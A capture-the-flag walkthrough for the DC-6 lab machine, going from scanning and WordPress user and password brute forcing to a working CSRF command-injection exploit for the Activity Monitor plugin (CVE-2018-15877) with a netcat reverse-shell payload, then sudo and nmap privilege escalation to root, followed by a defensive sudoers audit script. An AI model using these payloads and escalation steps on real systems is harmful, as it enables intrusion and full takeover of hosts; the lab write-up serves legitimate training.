1. nmap -sP 192.168.0.100/24 : the usual internal network scan to locate the target's IP
2. nmap -A -p 1-65535 192.168.0.141 : port scan; 22 and 80 are open
3. dirb http://192.168.0.141 : look at the directories; opening the site in Firefox shows it is WordPress
4. wpscan --url http://wordy -e u : gives five possible users: admin/graham/mark/sarah/jens
5. cewl http://wordy -w passwd.txt : crawl the site to build a password list; wpscan --url http://wordy --usernames /root/Desktop/username.txt --passwords /root/Desktop/password.txt : result "No Valid Passwords Found." Failed...
6. Looked on the official site and found the hint: gunzip rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt : build the password list; wpscan --url http://wordy --usernames /root/Desktop/username.txt --passwords /root/Desktop/passwords.txt : gives mark:helpdesk01
7. WordPress vulnerabilities mostly live in plugins. After logging in we find the Activity Monitor plugin in use. wpscan can enumerate this plugin as well: wpscan --url http://wordy --plugins-detection aggressive
8. searchsploit activity monitor : check whether an exploit exists; there is a remote code execution one, and we use the command-injection variant. The domain and the Kali IP need to be changed:
<html>
<!--
WordPress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: Lydéric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc 192.168.0.103 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
9. python -m SimpleHTTPServer 80 : start an HTTP server with Python; nc -lvp 9999 : listen on Kali; open 192.168.0.103/123.html, click the button, and the reverse shell comes back
10. cd /home ; ls : look at what each user's home contains; in stuff there is things-to-do.txt, which holds a user password: graham:GSo7isUM1D4
11. python -c 'import pty;pty.spawn("/bin/bash")' ; sudo -l : check which special privileges graham has; backups.sh can be run as jens without a password:
12. cd /home/jens ; cat backups.sh : see what backups.sh is; it is a bash script, so appending /bin/bash or /bin/sh at the end is enough to get the privileges
13. echo "/bin/sh" >> backups.sh : the hint tells us to use /bin/sh
14. sudo -u jens ./backups.sh : run the file as jens
15. Now with jens's privileges, sudo -l shows that nmap is allowed; escalate through nmap
16. nmap -v : check the version; echo 'os.execute("/bin/bash")' > shell ; sudo nmap --script=shell
17. cd /root ; cat theflag.txt
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Takeaways:
1. nmap privilege escalation
2. sudo -u jens ./backups.sh : running a program as another user
3. Activity Monitor plugin vulnerability
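From the defender's side, takeaways 1 and 2 come down to one sudoers audit. The script below is an added example, not part of the original walkthrough: it parses a constructed sudoers excerpt modelled on the DC-6 chain and flags rules whose target script is writable by the calling user (the backups.sh case) and rules whose target binary can run caller-supplied code through an option (the nmap --script case). The file metadata is an in-memory stand-in for os.stat so it runs offline, and SHELL_ESCAPE_BINARIES is an illustrative subset I assumed for the example, not an authoritative list.

```python
"""Sudoers audit for the two weaknesses the DC-6 chain abuses.

Added example, not part of the original walkthrough. It flags sudo rules
whose target is a script the calling user can modify (backups.sh) and rules
whose target binary can execute caller-supplied code via an option
(nmap --script). File metadata is an in-memory stand-in for os.stat so the
script runs offline; SHELL_ESCAPE_BINARIES is an illustrative, constructed
subset rather than an authoritative catalogue.
"""
import re
from dataclasses import dataclass

# Illustrative subset (assumption): binaries that will run code given the right option.
SHELL_ESCAPE_BINARIES = {"nmap", "vim", "less", "find", "python", "perl"}

# Constructed sudoers excerpt modelled on the privilege chain in the writeup.
SAMPLE_SUDOERS = """
# constructed excerpt, not the real DC-6 /etc/sudoers
Defaults    env_reset
graham  ALL=(jens) NOPASSWD: /home/jens/backups.sh
jens    ALL=(root) NOPASSWD: /usr/bin/nmap
mark    ALL=(root) /usr/bin/apt-get
"""


@dataclass
class FileInfo:
    owner: str
    mode: int   # POSIX permission bits, e.g. 0o755


# Constructed file metadata standing in for os.stat on the target host.
FILES = {
    "/home/jens/backups.sh": FileInfo("jens", 0o777),  # world-writable, as on DC-6
    "/usr/bin/nmap": FileInfo("root", 0o755),
    "/usr/bin/apt-get": FileInfo("root", 0o755),
}


@dataclass
class SudoRule:
    user: str
    run_as: str
    nopasswd: bool
    command: str


# Matches simple 'user host=(runas) [TAG:] cmd, cmd' lines; aliases are not handled.
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$"
)


def parse_sudoers(text):
    """Parse rule lines into SudoRule objects; comments and Defaults are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        run_as = m.group("runas").split(":")[0].strip() or "root"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmd").split(","):
            rules.append(SudoRule(m.group("user"), run_as, nopasswd, cmd.strip()))
    return rules


def writable_by(path, user):
    """Owner write bit or world write bit; group membership is not modelled here."""
    info = FILES.get(path)
    if info is None:
        return False
    if info.owner == user and info.mode & 0o200:
        return True
    return bool(info.mode & 0o002)


def audit(rules):
    """Return (user, run_as, target, reason) for every risky rule."""
    findings = []
    for r in rules:
        target = r.command.split()[0]
        if writable_by(target, r.user):
            findings.append((r.user, r.run_as, target, "target writable by caller"))
        if target.rsplit("/", 1)[-1] in SHELL_ESCAPE_BINARIES:
            findings.append((r.user, r.run_as, target, "binary can run caller-supplied code"))
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print("RISK %s -> %s via %s: %s" % f)
```

On a real host, replace FILES with os.stat lookups and feed it /etc/sudoers or the output of sudo -l. The fixes the findings point at are the usual ones: sudo targets should be root-owned and not writable by the caller, and a rule should not hand out a binary that accepts a script or shell-escape option when a narrower wrapper would do.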